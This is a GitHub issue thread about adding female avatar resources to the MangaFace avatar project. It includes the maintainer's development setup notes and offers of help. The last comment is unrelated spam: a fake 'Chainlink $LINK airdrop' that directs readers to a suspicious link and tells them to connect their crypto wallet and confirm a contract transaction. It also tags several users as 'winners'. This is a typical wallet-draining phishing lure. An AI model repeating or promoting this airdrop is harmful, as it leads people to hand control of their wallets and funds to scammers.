### ISSUE TITLE
Any resources for creating a female avatar?

### ISSUE THREAD

**Issue by myst729** [miladnia/MangaFace#2]

**Comment by miladnia** [comment]
Hi @myst729,
Sorry, there is no option for female avatars.
But fortunately, after 10 years I did some improvements recently and I hope to add this feature ASAP.
Thank you for sharing your opinion with me.

**Comment by myst729** [comment]
Well, an interesting story (to me). Over ten years ago I made this https://myst729.github.io/toys/favatar/ which "steals" resources from [FaceYourManga](https://www.faceyourmanga.com/). By then my approach to "steal" is to take screenshots and tweak in photoshop (stupid). Really a hard work so it's very simple.

The other day (last year I guess) my daughter found it and she enjoyed. She asked me to make it possible to create female avatars. (FaceYourManga sticks to Flash?)

![image](https://user-images.githubusercontent.com/519733/236736167-93c6923e-3255-4da0-a975-8b8f385c3ef5.png)

Last weekend I use your resources to build a pure frontend app https://myst729.github.io/vue-favatar/

Icons and resources are loaded as zip files and extracted in the browser to improve performance. However, I'm still looking for female resources.

**Comment by miladnia** [comment]
Great job. Now I know what the real problem is. At the moment I have a solution for you that might be less painful than doing Photoshop stuff. Please contact me through my email address.

**Comment by myst729** [comment]
Yep, my problem is not about coding (BTW, I used to write PHP too, and was a WordPress contributor 😆). I'm just looking for some female resources so that I could add a gender selector right after app initialized.

**Comment by Wulfheart** [comment]
@miladnia are female avatars supported yet?

**Comment by miladnia** [comment]
> @miladnia are female avatars supported yet?

Hi @Wulfheart
Unfortunately, it's not supported yet.
To be honest, about 3 or 4 months ago, I started refactoring the client side code just for fun, but I didn't get the chance to finish it. First of all, I'm looking for an opportunity to accomplish it first, then I'll start working on the female avatars. There are many old and messy graphics files that need to be sorted and then combined.

**Comment by Wulfheart** [comment]
@miladnia Let me know if you need help with it. I don’t know the graphics stuff but I know my way around code.

**Comment by miladnia** [comment]
@Wulfheart 
I appreciate you Alex.
Definitely, I will be so glad to have your help.
Finally, I pushed my commits to the repository, please check the `newui` branch.
The devcontainer configurations is also ready now, you can run and try the project using GitHub Codespaces.

Please change the value of the `APP_CDN` in `.env` file to the URL of your Codespace, like this one:
`APP_CDN="https://upgraded-fiesta-a1s49jh19p9fxfq6-8080.app.github.dev"`

And then run this command:
`composer run buildall`

First of all, I think you can start with `web-client/app.js` and `web-client/view.js` files. There are also two corresponding files in the `master` branch. It's probably not a bad idea to compare the files in both branches. New files are so simple. Everything starts with `app.js` and the `view.js` file is currently based on three main components `TabCom`, `GridCom` and `PinboardCom`.

Please let me know what you think about the project.
My email address is `miladniaa [at] gmail`

Best regards

**Comment by jalamari2018** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @alan-andrade, @g147, @jl2fa, @tsutsuken, @gofenix, @matthope1, @ahmethedev
